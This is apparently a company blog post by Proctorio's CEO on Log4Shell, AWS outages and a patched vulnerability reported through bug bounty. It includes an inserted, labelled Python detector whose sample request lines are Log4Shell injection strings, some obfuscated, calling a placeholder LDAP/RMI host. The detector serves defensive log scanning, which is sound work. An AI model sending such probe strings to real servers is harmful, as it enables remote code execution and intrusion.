Security in an Unsecured World
Mike Olsen, Founder & CEO January 5, 2022
A trio of recent headlines has challenged the sense of security students and institutions should feel around the very important act of test taking. While none of the three resulted in any data or privacy breach for Proctorio users, I want to briefly discuss each of them here.
First up, Apache Log4j. This is a widely used Java logging library that developers embed in websites and applications to record what their software is doing. In December a vulnerability in it, known as Log4Shell (CVE-2021-44228), was disclosed that lets an attacker take control of a vulnerable server simply by getting it to log a specially crafted string. Proctorio, however, does not rely in any way on Log4j, so this vulnerability did not affect anyone using our service. Out of precaution, our nightly scanners have been updated to check for it and our WAF rules to block the attack pattern.
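Because the crafted string can arrive in any field a server happens to log, a rule that looks for the literal word "jndi" both misses disguised payloads and flags innocent requests. The following is an added example, not Proctorio's WAF rules or any code from the original post: a small Python detector run over constructed sample request lines, contrasting a naive substring check with one that first undoes the percent-encoding and nested-lookup tricks attackers used against Log4j. The request lines, the RFC 5737 address 198.51.100.7 and the function names (`normalize`, `naive_match`, `is_log4shell_probe`, `scan`) are all constructed for this example.

```python
"""Added example: spotting Log4Shell (CVE-2021-44228) probes in request logs.

Not code from the original post or from Proctorio. The sample requests,
the RFC 5737 address 198.51.100.7 and all function names are constructed
for illustration.
"""
import re
from urllib.parse import unquote

# Constructed sample request lines (method, path, user-agent); none is real traffic.
SAMPLE_REQUESTS = [
    # 0: ordinary request
    'GET / HTTP/1.1 "Mozilla/5.0 (X11; Linux x86_64)"',
    # 1: benign query that merely contains the word (naive substring check false-positives)
    'GET /search?q=jndi:ldap+tutorial HTTP/1.1 "curl/7.79"',
    # 2: undisguised probe in the User-Agent
    'GET / HTTP/1.1 "${jndi:ldap://198.51.100.7:1389/a}"',
    # 3: lower() lookups hide the keyword from a literal match
    'GET / HTTP/1.1 "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    # 4: empty-key default values (${::-x}) spell it out one letter at a time
    'GET / HTTP/1.1 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    # 5: env lookup whose default is the letter, with the whole thing percent-encoded
    'GET /?x=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1 "-"',
]

# ${lower:X} / ${upper:X}  -> X   (case does not matter for the final check)
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# ${key:-default} with any key, including the empty key in ${::-x}  -> default
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# what we are actually looking for once the disguises are gone
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Peel off percent-encoding and innermost lookups until nothing changes.

    Each round resolves one layer, so nested tricks such as ${lower:${lower:j}}
    or double percent-encoding need several rounds; max_rounds bounds the work
    on hostile input.
    """
    for _ in range(max_rounds):
        before = text
        text = unquote(text)                      # undo one layer of %XX encoding
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def naive_match(line: str) -> bool:
    """The rule many people wrote first: look for the literal keyword."""
    return "jndi:" in line.lower()


def is_log4shell_probe(line: str) -> bool:
    """Flag a line only if it contains a JNDI lookup after normalisation."""
    return _JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (index, naive_verdict, normalized_verdict) for every line."""
    return [(i, naive_match(l), is_log4shell_probe(l)) for i, l in enumerate(lines)]


if __name__ == "__main__":
    for i, naive, real in scan(SAMPLE_REQUESTS):
        print(f"{i}: naive={naive!s:5} normalized={real!s:5}  {SAMPLE_REQUESTS[i][:60]}")
```

On the six constructed lines the naive rule gets four of them wrong (it flags line 1 and misses lines 3 to 5), while the normalising rule flags exactly the four probes. The normaliser only knows the lookup tricks listed in it, so a rule like this buys time rather than closing the hole; the fix for anything that does ship Log4j is to upgrade it.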
The second big story was about the multiple AWS outages in the last month. Amazon Web Services powers much of the internet. When it goes down, many of the websites and apps that people rely on daily go down as well. Long ago, we decided Proctorio would spread its infrastructure not just across multiple AWS regions but across multiple cloud providers. It was a costly decision and one that many people told me was overly cautious, but it's the smartest logistical choice we've made in our eight years.
The third story hit a bit closer to home, as it related to a vulnerability discovered in Proctorio's own code. Here's a brief timeline. On June 17th of last summer, a group called Sector7 contacted us about a vulnerability they had discovered in our code. They have a reputation as a sophisticated group of ethical hackers and, I have to admit, I was impressed. It was a complex attack that they orchestrated, but it worked.
No coder likes to find that their work is fallible, but it's part of the job. In fact, we've baked it into operations here at Proctorio. We work with HackerOne, a bug bounty platform, specifically to keep us on our toes and honest. We credit our collaboration with ethical hackers as one of the reasons why our service keeps improving. We patched, tested and released the fix to production within a week, on June 24th, seven days after the report. Sector7 acknowledged the successful patching of the vulnerability on August 3rd.
On September 19th, we took the further step towards transparency by filing for public disclosure ourselves. This required Sector7 to approve the release. When they did not, we reached out to them on December 13th and officially closed the matter. Going forward, working with HackerOne and the wider ethical-hacker community, Proctorio will be allowed to publish such reports on its own after 30 days. More important, we used our telemetry logs, and confirmed with Sector7, to establish that their report was the only instance of this vulnerability being exploited. We can safely say that not only was this potential exploit fixed quickly, it did not impact the security or privacy of our end users.
This is how we keep your data secure.
A lot of people forget that Proctorio started out as an accommodation. In education circles, an accommodation is anything a university or institution can provide for a student who has additional needs in order to take a test to the best of their ability. This could be a student experiencing dyslexia being given extra time or someone with autism who needs a less stimulating environment. Proctorio was designed to similarly extend the promise of education to rural people so they'd need to make one less trip into town, to working parents who needed to stay with a sick child, to people changing industries who have a full work schedule at their day job.
For the first five years, we operated largely out of the spotlight. We built our business one university at a time. Then one college system at a time. Then one governmental agency at a time. At each step we balanced the desire to democratize education with the very real need to keep the testing process safe and secure. We like to say that in our eight years of operation, we've been down for only eight minutes. That's a snappy line from our marketing department, but it's a number we're quietly very proud of.
Always available. Always secure.